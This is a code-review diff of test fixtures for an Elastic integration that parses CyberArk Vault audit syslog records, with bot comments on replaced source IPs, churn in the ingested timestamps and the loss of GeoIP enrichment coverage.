\u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:27\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:27Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n 
\u003cMessageID\u003e62\u003c/MessageID\u003e\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Create File Version", "message": "Create File Version", "issuer": "PSMPApp_SSH", 
@@ -538,8 +470,8 @@ "event": { "severity": 2, "action": "create file version", - "ingested": "2021-06-09T10:24:36.502267700Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:27\",\"IsoTimestamp\":\"2021-03-14T12:57:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Create File 
Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_SSH.LiveSessions\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:09.726796100Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:27\",\"IsoTimestamp\":\"2021-03-14T12:57:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_SSH.LiveSessions\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log index 82be0d698c1..642ca7704b6 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log 
@@ -5,8 +5,8 @@ <5>1 2021-03-04T19:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 04 11:11:23","IsoTimestamp":"2021-03-04T19:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} <5>1 2021-03-05T10:18:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 05 02:18:50","IsoTimestamp":"2021-03-05T10:18:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PVWAAppUser","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} <5>1 2021-03-08T18:07:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:07:51","IsoTimestamp":"2021-03-08T18:07:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 
00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"37.223.7.45","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} -<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} -<5>1 2021-03-10T09:11:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:49","IsoTimestamp":"2021-03-10T09:11:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 
02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"Administrator","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-10T09:11:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:48","IsoTimestamp":"2021-03-10T09:11:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} +<5>1 2021-03-10T09:11:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:11:49","IsoTimestamp":"2021-03-10T09:11:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"7","Desc":"Logon","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logon","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logon","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json index a2df4596360..7bace2e2b98 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json 
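Review bot: All five replaced records in this hunk now carry the same `"Station":"67.43.156.13"`, whereas the original fixture had two distinct public stations (81.32.170.205 for the Administrator and PSMP* logons, 37.223.7.45 for the second Administrator logon), so the fixture no longer demonstrates that different source stations surface as different source.ip / related.ip values. Keeping the second Administrator logon on another address from the same supported range, e.g. `"Station":"67.43.156.14"`, preserves that property at no cost, assuming the whole range is supported by the test GeoIP database and not just the single address. The Station value is the only field these events are keyed on in the expected output, so the collapse is easy to miss when reviewing the regenerated JSON.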
@@ -49,7 +49,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675175400Z", + "ingested": "2021-12-09T13:37:10.420964800Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e7\u003c/MessageID\u003e\\n \u003cDesc\u003eLogon\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eLogon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.2.0.6\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogon\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.2.0.3\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.2.0.6\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.2.0.3\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\"}}}", "code": "7", "kind": "event", 
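Review bot: The only change in this hunk is `event.ingested`, a wall-clock value that is rewritten on every regeneration of the expected file, so the hunk (and the matching ones below) is pure churn that hides the real changes in this file. If the elastic-package version in use supports it, marking the field as dynamic in the test's config file, e.g. `dynamic_fields:` / `  event.ingested: ".*"` in `test-7-logon.log-config.yml`, makes regeneration stop touching it. This is a tooling point rather than a defect in the expectation itself.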
@@ -116,7 +116,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675184400Z", + "ingested": "2021-12-09T13:37:10.420973400Z", "original": "\u003c5\u003e1 2021-03-04T19:10:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:05\",\"IsoTimestamp\":\"2021-03-04T19:10:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -183,7 +183,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675186400Z", + "ingested": "2021-12-09T13:37:10.420978900Z", "original": "\u003c5\u003e1 2021-03-04T19:10:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:20\",\"IsoTimestamp\":\"2021-03-04T19:10:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"SCIM-user\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", 
@@ -250,7 +250,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675187800Z", + "ingested": "2021-12-09T13:37:10.420984300Z", "original": "\u003c5\u003e1 2021-03-04T19:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:11:20\",\"IsoTimestamp\":\"2021-03-04T19:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -317,7 +317,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675189100Z", + "ingested": "2021-12-09T13:37:10.420989600Z", "original": "\u003c5\u003e1 2021-03-04T19:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:11:23\",\"IsoTimestamp\":\"2021-03-04T19:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", 
@@ -384,7 +384,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675190400Z", + "ingested": "2021-12-09T13:37:10.420995100Z", "original": "\u003c5\u003e1 2021-03-05T10:18:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 05 02:18:50\",\"IsoTimestamp\":\"2021-03-05T10:18:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -460,7 +460,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675191700Z", + "ingested": "2021-12-09T13:37:10.421000500Z", "original": "\u003c5\u003e1 2021-03-08T18:07:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:07:51\",\"IsoTimestamp\":\"2021-03-08T18:07:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "7", "kind": "event", 
@@ -489,20 +489,8 @@ "ip": "10.0.1.20" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -525,7 +513,7 @@ "Administrator" ], "ip": [ - "81.32.170.205", + "67.43.156.13", "10.0.1.20" ] }, @@ -535,7 +523,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-09T08:32:51Z", "gateway_station": "10.0.1.20", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Logon", "message": "Logon", "issuer": "Administrator", 
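Review bot: The regenerated expectation drops the whole `source.geo` object and keeps only `"address"` / `"ip"` for 67.43.156.13, so this file no longer asserts anything about GeoIP enrichment of source.ip, which the previous version did; the same pattern repeats in the sibling hunks for the other replaced stations. If the audit pipeline still runs a geoip processor on source.ip, it is worth confirming whether 67.43.156.13 simply does not resolve in the test GeoIP database (in which case that processor is now untested by this fixture) or whether enrichment was deliberately dropped. Either way, a sentence in the PR description saying that source.geo is no longer covered for this data stream would make the intent clear to the next person regenerating these files.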
@@ -548,8 +536,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:36.675192900Z", - "original": "\u003c5\u003e1 2021-03-09T08:32:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 00:32:51\",\"IsoTimestamp\":\"2021-03-09T08:32:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:37:10.421003800Z", + "original": "\u003c5\u003e1 2021-03-09T08:32:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 00:32:51\",\"IsoTimestamp\":\"2021-03-09T08:32:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "7", "kind": "event", "action": "authentication_success", 
@@ -577,20 +565,8 @@ "ip": "10.0.1.20" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "37.223.7.45", - "ip": "37.223.7.45" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -613,7 +589,7 @@ "Administrator" ], "ip": [ - "37.223.7.45", + "67.43.156.13", "10.0.1.20" ] }, @@ -623,7 +599,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-09T10:14:58Z", "gateway_station": "10.0.1.20", - "station": "37.223.7.45", + "station": "67.43.156.13", "action": "Logon", "message": "Logon", "issuer": "Administrator", 
